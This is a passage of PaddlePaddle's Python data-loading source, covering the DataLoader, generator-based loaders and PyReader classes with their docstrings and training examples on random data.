batch indices, a substitution parameter for :attr:`batch_sampler`
see :attr:`batch_size`. Default False.
drop_last(bool): whether drop the last incomplete batch dataset size
is not divisible by the batch size, a substitution parameter
for :attr:`batch_sampler`, see :attr:`batch_size`. Default False
collate_fn(callable): function to generate mini-batch data by merging
the sample list, None for only stack each fields of sample in axis
0(same as :attr::`np.stack(..., axis=0)`). Default None
num_workers(int): the number of subprocess to load data, 0 for no
subprocess used and loading data in main process. Default 0
use_buffer_reader (bool): whether to use bufferred reader.
If use_buffer_reader=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data. Default True.
use_shared_memory (bool): whether to use shared memory to speed up
putting data into inter-process queue, set :attr:`use_shared_memory`
as True only when the shared memory space on your machine(e.g.
space of '/dev/shm' on Linux operating sysytem) is large enough.
Shared memory will only be enabled in multi-process mode(num_workers
> 0). Default True.
timeout(int): the timeout value for getting data form output queue
of subprocesses. Default 0.
worker_init_fn(callable): init function which will be called with
worker id on each subproces starting if not set as None. Default
None.
Returns:
DataLoader: an iterable object for data iterating, each elemnet of the generated data is a Tensor.
Examples:
.. code-block:: python
import numpy as np
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddle.io import Dataset, BatchSampler, DataLoader
BATCH_NUM = 20
BATCH_SIZE = 16
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
# define a random dataset
class RandomDataset(Dataset):
def __init__(self, num_samples):
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([IMAGE_SIZE]).astype('float32')
label = np.random.randint(0, CLASS_NUM - 1, (1, )).astype('int64')
return image, label
def __len__(self):
return self.num_samples
dataset = RandomDataset(BATCH_NUM * BATCH_SIZE)
class SimpleNet(nn.Layer):
def __init__(self):
super(SimpleNet, self).__init__()
self.fc = nn.Linear(IMAGE_SIZE, CLASS_NUM)
def forward(self, image, label=None):
return self.fc(image)
simple_net = SimpleNet()
opt = paddle.optimizer.SGD(learning_rate=1e-3,
parameters=simple_net.parameters())
loader = DataLoader(dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, (image, label) in enumerate(loader()):
out = simple_net(image)
loss = F.cross_entropy(out, label)
avg_loss = paddle.mean(loss)
avg_loss.backward()
opt.minimize(avg_loss)
simple_net.clear_gradients()
print("Epoch {} batch {}: loss = {}".format(e, i, np.mean(loss.numpy())))
.. note::
For reading iterable dataset with multiprocess Dataloader,
please see :code:`paddle.io.IterableDataset`
"""
def __init__(self,
dataset,
feed_list=None,
places=None,
return_list=True,
batch_sampler=None,
batch_size=1,
shuffle=False,
drop_last=False,
collate_fn=None,
num_workers=0,
use_buffer_reader=True,
use_shared_memory=True,
timeout=0,
worker_init_fn=None):
self.return_list = return_list
self.collate_fn = collate_fn
self.use_buffer_reader = use_buffer_reader
self.worker_init_fn = worker_init_fn
assert isinstance(dataset, Dataset), \
"dataset should be subclass instance of paddle.io.Dataset"
self.dataset = dataset
if not return_list and not in_dygraph_mode():
assert feed_list is not None, \
"feed_list should be set when return_list=False"
self.feed_list = feed_list
if places is None:
places = _current_expected_place()
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self.places = _convert_places(places)
assert num_workers >= 0, "num_workers should be a non-negative value"
if num_workers > 0 and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"DataLoader with multi-process mode is not supported on MacOs and Windows currently." \
" Please use signle-process mode with num_workers = 0 instead")
num_workers = 0
self.num_workers = num_workers
self.use_shared_memory = use_shared_memory
if use_shared_memory and num_workers == 0:
self.use_shared_memory = False
assert timeout >= 0, "timeout should be a non-negative value"
self.timeout = timeout
if isinstance(dataset, IterableDataset):
self.dataset_kind = _DatasetKind.ITER
if shuffle:
raise ValueError(
"IterableDataset not support shuffle, but got shuffle={}".
format(shuffle))
if batch_sampler is not None:
raise ValueError(
"IterableDataset expect unspecified batch_sampler")
else:
self.dataset_kind = _DatasetKind.MAP
if batch_sampler is not None:
assert batch_size == 1 and not shuffle and not drop_last, \
"batch_size/shuffle/drop_last should not be set when " \
"batch_sampler is given"
self.batch_sampler = batch_sampler
self.batch_size = None
elif batch_size is None:
self.batch_sampler = None
self.batch_size = None
else:
assert batch_size > 0, \
"batch_size should be None or a positive value when " \
"batch_sampler is not given"
self.batch_size = batch_size
if isinstance(dataset, IterableDataset):
self.batch_sampler = _InfiniteIterableSampler(dataset,
batch_size)
else:
self.batch_sampler = BatchSampler(
dataset=dataset,
batch_size=batch_size,
shuffle=shuffle,
drop_last=drop_last)
self.auto_collate_batch = self.batch_sampler is not None
self.pin_memory = False
if in_dygraph_mode():
self.pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
def __len__(self):
if self.dataset_kind == _DatasetKind.ITER:
raise ValueError("length of IterableDataset not supported")
else:
if self.auto_collate_batch:
return len(self.batch_sampler)
else:
return len(self.dataset)
def __iter__(self):
if self.num_workers == 0:
return _DataLoaderIterSingleProcess(self)
else:
return _DataLoaderIterMultiProcess(self)
def __call__(self):
return self.__iter__()
@staticmethod
def from_generator(feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
use_multiprocess=False,
drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
.. note::
**The framework ensures that the data loading order of DataLoader is exactly the same as the user-defined data source.**
Create a DataLoader object for loading data from Python generator.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously.
The created DataLoader object provides 3 methods to set the data source
:code:`set_sample_generator` , :code:`set_sample_list_generator` and
:code:`set_batch_generator` . Please see the following example codes
to know their usages.
If iterable = True, the created DataLoader object is a Python generator
object, which is iterable using for-range loop.
If iterable = False, the created DataLoader object provides
:code:`start()` and :code:`reset()` method to control the data reading
process.
Args:
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`fluid.data()`.
capacity (int): capacity of the queue maintained in DataLoader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created DataLoader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed Tensors. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
use_multiprocess (bool): whether to use multi-process to speed up
the data loading process in dygraph. Note: this parameter only
can be used in the dygraph mode. In the static graph mode,
whether this parameter is set or not has no effect.
The Default value is False.
drop_last (bool): whether to drop the last batches whose number is
less than the CPU core/GPU card number. The default value is
True. In training phase, users should not set drop_last=False,
because all CPU cores/GPU cards must read data from DataLoader.
In inference phase, users can set drop_last=False, so that the
last batches whose number is less than the CPU core/GPU card
number can be tested.
Returns:
loader (DataLoader): the created DataLoader object.
Examples 1:
.. code-block:: python
'''
Example in static graph mode
'''
import numpy as np
import paddle
import paddle.static as static
import paddle.nn.functional as F
BATCH_NUM = 10
BATCH_SIZE = 16
EPOCH_NUM = 4
CLASS_NUM = 10
ITERABLE = True # whether the created DataLoader object is iterable
USE_GPU = False # whether to use GPU
DATA_FORMAT = 'batch_generator' # data format of data source user provides
paddle.enable_static()
def simple_net(image, label):
fc_tmp = static.nn.fc(image, size=CLASS_NUM)
cross_entropy = F.softmax_with_cross_entropy(image, label)
loss = paddle.mean(cross_entropy)
sgd = paddle.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
def get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
# If the data generator yields one sample each time,
# use DataLoader.set_sample_generator to set the data source.
def sample_generator_creator():
def __reader__():
for _ in range(BATCH_NUM * BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
yield image, label
return __reader__
# If the data generator yield list of samples each time,
# use DataLoader.set_sample_list_generator to set the data source.
def sample_list_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
sample_list = []
for _ in range(BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
sample_list.append([image, label])
yield sample_list
return __reader__
# If the data generator yields a batch each time,
# use DataLoader.set_batch_generator to set the data source.
def batch_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = get_random_images_and_labels([BATCH_SIZE, 784], [BATCH_SIZE, 1])
yield batch_image, batch_label
return __reader__
# If DataLoader is iterable, use for loop to train the network
def train_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
for data in loader():
exe.run(prog, feed=data, fetch_list=[loss])
# If DataLoader is not iterable, use start() and reset() method to control the process
def train_non_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
loader.start() # call DataLoader.start() before each epoch starts
try:
while True:
exe.run(prog, fetch_list=[loss])
except paddle.core.EOFException:
loader.reset() # call DataLoader.reset() after catching EOFException
def set_data_source(loader, places):
if DATA_FORMAT == 'sample_generator':
loader.set_sample_generator(sample_generator_creator(), batch_size=BATCH_SIZE, drop_last=True, places=places)
elif DATA_FORMAT == 'sample_list_generator':
loader.set_sample_list_generator(sample_list_generator_creator(), places=places)
elif DATA_FORMAT == 'batch_generator':
loader.set_batch_generator(batch_generator_creator(), places=places)
else:
raise ValueError('Unsupported data format')
image = static.data(name='image', shape=[None, 784], dtype='float32')
label = static.data(name='label', shape=[None, 1], dtype='int64')
# Define DataLoader
loader = paddle.io.DataLoader.from_generator(feed_list=[image, label], capacity=16, iterable=ITERABLE)
# Define network
loss = simple_net(image, label)
# Set data source of DataLoader
#
# If DataLoader is iterable, places must be given and the number of places must be the same with device number.
# - If you are using GPU, call `paddle.static.cuda_places()` to get all GPU places.
# - If you are using CPU, call `paddle.static.cpu_places()` to get all CPU places.
#
# If DataLoader is not iterable, places can be None.
places = static.cuda_places() if USE_GPU else static.cpu_places()
set_data_source(loader, places)
exe = static.Executor(places[0])
exe.run(static.default_startup_program())
prog = static.CompiledProgram(static.default_main_program()).with_data_parallel(loss_name=loss.name)
if loader.iterable:
train_iterable(exe, prog, loss, loader)
else:
train_non_iterable(exe, prog, loss, loader)
Examples 2:
.. code-block:: python
'''
Example in dynamic graph mode.
'''
import numpy as np
import paddle
import paddle.nn as nn
import paddle.optimizer as opt
import paddle.distributed as dist
BATCH_SIZE = 16
BATCH_NUM = 4
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
USE_GPU = False # whether to use GPU
def _get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = _get_random_images_and_labels(
[BATCH_SIZE, IMAGE_SIZE], [BATCH_SIZE, CLASS_NUM])
yield batch_image, batch_label
def random_batch_reader():
return __reader__
class LinearNet(nn.Layer):
def __init__(self):
super(LinearNet, self).__init__()
self._linear = nn.Linear(IMAGE_SIZE, CLASS_NUM)
@paddle.jit.to_static
def forward(self, x):
return self._linear(x)
# set device
paddle.set_device('gpu' if USE_GPU else 'cpu')
# create network
layer = LinearNet()
dp_layer = paddle.DataParallel(layer)
loss_fn = nn.CrossEntropyLoss()
adam = opt.Adam(learning_rate=0.001, parameters=dp_layer.parameters())
# create data loader
loader = paddle.io.DataLoader.from_generator(capacity=5)
loader.set_batch_generator(random_batch_reader())
for epoch_id in range(EPOCH_NUM):
for batch_id, (image, label) in enumerate(loader()):
out = layer(image)
loss = loss_fn(out, label)
loss.backward()
adam.step()
adam.clear_grad()
print("Epoch {} batch {}: loss = {}".format(
epoch_id, batch_id, np.mean(loss.numpy())))
Examples 3:
.. code-block:: python
'''
Example of `drop_last` using in static graph multi-cards mode
'''
import paddle
import paddle.static as static
import numpy as np
import os
# We use 2 CPU cores to run inference network
os.environ['CPU_NUM'] = '2'
paddle.enable_static()
# The data source has only 3 batches, which can not be
# divided evenly to each CPU core
def batch_generator():
for i in range(3):
yield np.array([i+1]).astype('float32'),
x = static.data(name='x', shape=[None], dtype='float32')
y = x * x
def run_inference(drop_last):
loader = paddle.io.DataLoader.from_generator(feed_list=[x],
capacity=8, drop_last=drop_last)
loader.set_batch_generator(batch_generator, static.cpu_places())
exe = static.Executor(paddle.CPUPlace())
prog = static.CompiledProgram(static.default_main_program())
prog = prog.with_data_parallel()
result = []
for data in loader():
each_ret, = exe.run(prog, feed=data, fetch_list=[y])
result.extend(each_ret)
return result
# Set drop_last to True, so that the last batch whose
# number is less than CPU core number would be discarded.
print(run_inference(drop_last=True)) # [1.0, 4.0]
# Set drop_last to False, so that the last batch whose
# number is less than CPU core number can be tested.
print(run_inference(drop_last=False)) # [1.0, 4.0, 9.0]
"""
if in_dygraph_mode():
return DygraphGeneratorLoader(feed_list, capacity,
use_double_buffer, iterable,
return_list, use_multiprocess)
else:
return GeneratorLoader(feed_list, capacity, use_double_buffer,
iterable, return_list, drop_last)
@staticmethod
def from_dataset(dataset, places, drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-processes acceleration.
Create an iterable DataLoader object for loading data from Dataset.
Dataset is only supported in Linux system currently.
Args:
dataset (InMemoryDataset|QueueDataset): the dataset object.
places (list(CUDAPlace)|list(CPUPlace)|list(str)): places where the result
data should be converted. If places is list of string, the string in the list
can be ``cpu``, ``gpu:x`` and ``gpu_pinned``, where x is the index of the GPUs.
drop_last (bool): whether to drop the last batch whose sample
number is less than batch size. If drop_last = True, they
would be dropped. If drop_last = False, they would be kept.
Returns:
loader (DataLoader): the created DataLoader object, which can be
treated as a Python generator.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
image = static.data(name='image', shape=[None, 784], dtype='float32')
label = static.data(name='label', shape=[None, 1], dtype='int64')
dataset = paddle.distributed.QueueDataset()
dataset.init(
batch_size=32,
pipe_command='cat',
use_var=[image, label])
dataset.set_filelist(['a.txt', 'b.txt', 'c.txt'])
loader = paddle.io.DataLoader.from_dataset(dataset, static.cpu_places())
"""
return DatasetLoader(dataset, places, drop_last)
class DygraphGeneratorLoader(DataLoaderBase):
"""
The GeneratorLoader of dygraph
The multiprocess dygraph GeneratorLoader's most functions are different from
static graph GeneratorLoader, Separate implementation to keep code readable.
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=True,
use_multiprocess=False):
self._batch_reader = None
self._places = None
self._feed_list = feed_list
if not capacity:
raise ValueError("Please give value to capacity.")
self._capacity = capacity
self._use_double_buffer = use_double_buffer
if not iterable:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports iterable mode only. Change to iterable mode."
)
self._iterable = True
if not return_list:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports returning as list only. Change to return as list."
)
self._return_list = True
# NOTE: the multiprocessing in different platform is incompatible, we will solve it later
self._use_multiprocess = use_multiprocess
if self._use_multiprocess and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"NOTE: DygraphGeneratorLoader with multiprocess mode is not currently supported on MacOs and Windows."
)
self._use_multiprocess = False
if self._use_multiprocess:
# NOTE: the multiprocessing.Queue used to save loading data in self._process
self._data_queue = None
# NOTE: this process is used to load data asynchronously from self._batch_reader
self._process = None
# NOTE: the C++ LoDTensorBlockingQueue instance
self._blocking_queue = None
# NOTE: 1. In multiprocess mode, this thread is used to get next batch data from
# self._data_queue, then push it into self._blocking_queue; 2. In singleprocess
# mode, this thread is used to get next batch data from self._batch_reader, then
# push it into self._blocking_queue
self._thread = None
self._pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
@property
def queue(self):
return self._blocking_queue
@property
def iterable(self):
return self._iterable
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except queue.Empty:
break
global multiprocess_queue_set
multiprocess_queue_set.remove(self._data_queue)
def _wait_thread_ends(self):
thread = self._thread
if thread is not None:
self._blocking_queue.close()
thread.join()
def _wait_process_ends(self):
process = self._process
if process is not None:
process.join()
# erase process id
core._erase_process_pids(id(self))
def _init_iterable(self):
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
self._var_names = []
self._shapes = []
self._dtypes = []
self._need_check_feed = []
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, False)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer, True,
self._pin_memory)
def _start(self):
if self._use_multiprocess:
# clear old _data_queue and remove it from multiprocess_queue_set
self._clear_and_remove_data_queue()
# set data_queue and process
self._data_queue = multiprocessing.Queue(self._capacity)
# add _data_queue into global queue set
global multiprocess_queue_set
multiprocess_queue_set.add(self._data_queue)
self._process = multiprocessing.Process(
target=_reader_process_loop,
args=(self._batch_reader, self._data_queue))
self._process.daemon = True
self._process.start()
# Set child process signal handler
# NOTE: [ avoiding hang ] 1. if the child process dies due to bus error/segfault
# or just hang, the main process will hang waiting for data, so here need to deal
# with SIGSEGV and SIGBUS of child process; 2. if the main process end before child
# process, it shuts the all its daemonic children down with a SIGTERM (instead of
# joining them without a timeout), so here nedd to deal with SIGTERM.
core._set_process_pids(id(self), [self._process.pid])
_set_SIGCHLD_handler()
# Set reader_thread
self._thread_done_event = threading.Event()
self._thread = threading.Thread(
target=self._reader_thread_loop_for_multiprocess)
self._thread.daemon = True
self._thread.start()
else:
self._thread = threading.Thread(
target=self._reader_thread_loop_for_singleprocess)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._reader.reset()
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._batch_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
return self._reader.read_next_var_list()
except StopIteration:
self._reset()
six.reraise(*sys.exc_info())
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _reader_thread_loop_for_multiprocess(self):
while not self._thread_done_event.is_set():
try:
# NOTE: [ avoid hanging ] Even with carefully designed data dependencies
# (i.e., a put() always corresponding to a get()), hanging on get() can
# still happen when data in queue is corrupted (e.g., due to
# Queue.cancel_join_thread or unexpected exit). So we set a timeout whenever
# we try to get data from `data_queue`
# NOTE: [ avoid failed quickly ] Here, the time setting of QUEUE_GET_TIMEOUT
# is relatively long, currently it is 60 seconds, because in some models,
# if the reader child process starts with a heavy burden, the child process
# has no enough time to put the data in the queue when the main process
# start trying to get data from queue. At this time, the child thread needs
# to wait slightly longer
tensor_list = self._data_queue.get(timeout=QUEUE_GET_TIMEOUT)
except:
# NOTE [ avoid handing ] After adding the shared memory mechanism, not only
# the queue.Empty exception will occur here, but other exceptions will also
# occur, such as mmap failure. If it is not handled here, it will hang.
self._exit_thread_unexpectedly()
logging.error(
"DataLoader reader thread failed to read data from the multiprocessing.Queue."
)
six.reraise(*sys.exc_info())
if not self._thread_done_event.is_set():
if tensor_list is not None:
try:
array = core.LoDTensorArray()
for tensor in tensor_list:
array.append(tensor)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
else:
self._exit_thread_expectedly()
def _reader_thread_loop_for_singleprocess(self):
try:
for sample in self._batch_reader():
array = core.LoDTensorArray()
for item in sample:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning(
"DygraphDataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
return self
def set_sample_list_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
def __batch_reader_impl__():
for batch in reader():
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
yield slots
self.set_batch_generator(__batch_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self._batch_reader = reader
if places is None:
places = _current_expected_place()
self._places = _convert_places(places)
assert len(self._places) == 1, \
"Number of places must be 1 in imperative mode"
return self
class GeneratorLoader(DataLoaderBase):
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
drop_last=True):
self._tensor_reader = None
self._places = None
self._thread = None
self._queue = None
self._feed_list = feed_list
self._exited = False
self._drop_last = drop_last
self._keep_order = keep_data_loader_order()
if not capacity:
raise ValueError("Please give value to capacity.")
self._iterable = iterable
self._return_list = return_list
if not self._feed_list:
raise Exception("Feed list must be given under static mode.")
self._use_double_buffer = use_double_buffer
self._capacity = capacity
if not self._iterable:
self._init_non_iterable()
def _wait_thread_ends(self):
# Get self._thread first to prevent data race, because __thread_main__
# would set self._thread be None at the end
thread = self._thread
if thread is not None and self._iterable:
self._queue.close()
thread.join()
def _init_iterable(self):
self._wait_thread_ends()
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
self._queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, self._keep_order)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer,
self._drop_last, False)
def _init_non_iterable(self):
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in self._feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
queue_name = data_loader_unique_name_generator(
'lod_tensor_blocking_queue')
reader_name = data_loader_unique_name_generator('create_py_reader')
double_buffer_name = data_loader_unique_name_generator('double_buffer')
var = global_scope().var(queue_name)
self._queue = core.init_lod_tensor_blocking_queue(var, self._capacity,
self._keep_order)
if self._keep_order:
block = default_main_program().current_block()
else:
block = default_startup_program().current_block()
reader_var = block.create_var(name=reader_name)
dtype_int = [int(t) for t in dtypes]
block.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [reader_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
reader_var.desc.set_dtypes(dtypes)
reader_var.persistable = True
reader_var.stop_gradient = True
if self._keep_order:
main_prog_var = reader_var
reader = main_prog_var
reader.reset = self._queue.reset
else:
main_prog_var = _copy_reader_var_(
default_main_program().current_block(), reader_var)
main_prog_var.stop_gradient = True
main_prog_var.persistable = True
reader = monkey_patch_reader_methods(main_prog_var)
if self._use_double_buffer:
double_buffer_reader = double_buffer(
reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
self._reader = reader
default_main_program().current_block().append_op(
type='read',
inputs={'Reader': [self._reader]},
outputs={'Out': self._feed_list},
attrs={'drop_last': self._drop_last})
@property
def queue(self):
return self._queue
@property
def iterable(self):
return self._iterable
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._tensor_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if self._return_list:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._queue.close()
self._reset()
six.reraise(*sys.exc_info())
def start(self):
assert not self._iterable, "start() cannot be called when DataLoader is iterable"
self._start()
def reset(self):
assert not self._iterable, "reset() cannot be called when DataLoader is iterable"
self._reset()
def _start(self):
def __thread_main__():
try:
while not self._queue.wait_for_inited(1):
if self._exited:
return
for tensors in self._tensor_reader():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._queue.push(array):
break
self._queue.close()
self._thread = None
except Exception as ex:
self._queue.kill()
self._thread = None
logging.warn('Your reader has raised an exception!')
six.reraise(*sys.exc_info())
self._thread = threading.Thread(target=__thread_main__)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._queue.close()
self._exited = True
thread = self._thread
if thread is not None:
thread.join()
self._exited = False
self._reader.reset()
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
has_lod = False
for f in self._feed_list:
if f.lod_level != 0:
has_lod = True
break
if has_lod:
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
else:
reader = BatchedTensorProvider(
feed_list=self._feed_list,
place=core.CPUPlace(),
batch_size=batch_size,
generator=reader,
drop_last=drop_last)
self.set_batch_generator(reader, places=places)
return self
def set_sample_list_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
with program_guard(Program(), Program()):
feeder = DataFeeder(
feed_list=self._feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(reader, multi_devices=False)
def __tensor_reader_impl__():
for slots in paddle_reader():
yield [slots[var.name] for var in self._feed_list]
self.set_batch_generator(__tensor_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self._tensor_reader = reader
if self._iterable:
assert places is not None, "Places cannot be None when DataLoader is iterable"
self._places = _convert_places(places)
else:
if places is not None:
logging.info(
'places would be ommited when DataLoader is not iterable')
return self
class PyReader(DataLoaderBase):
r"""
Create a reader object for data feeding in Python.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously. Data in the queue would be extracted
automatically when `Executor.run(...)` is called.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.layers.data()`.
capacity (int): capacity of the queue maintained in PyReader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, PyReader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created PyReader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variables. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
Returns:
the created reader object.
Return type:
reader(Reader)
Examples:
1. If iterable = False, the created PyReader object is almost the
same as :code:`fluid.layers.py_reader()`. Operators would be
inserted into the program. User should call :code:`start()`
before each epoch and catch :code:`fluid.core.EOFException`
thrown by :code:`Executor.run()` when epoch ends. Once the
exception is caught, user should call :code:`reset()` to reset
the reader manually.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image_and_label(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label],
capacity=4,
iterable=False)
user_defined_reader = reader_creator_random_image_and_label(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE))
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(EPOCH_NUM):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
2. If iterable=True, the created PyReader object is decoupled with
the program. No operator would be inserted into the program.
In this case, the created reader is a Python generator, which
is iterable. User should feed the data yielded from PyReader
object into :code:`Executor.run(feed=...)`.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 10
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
